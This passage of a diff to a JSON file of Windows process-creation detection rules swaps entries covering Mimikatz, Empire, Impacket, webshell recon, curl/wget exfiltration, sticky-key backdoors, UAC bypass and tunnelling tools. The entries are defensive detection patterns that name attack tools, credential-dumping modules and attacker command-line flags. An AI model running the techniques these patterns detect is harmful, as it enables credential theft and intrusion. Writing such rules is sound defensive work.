"proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Administrative activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": 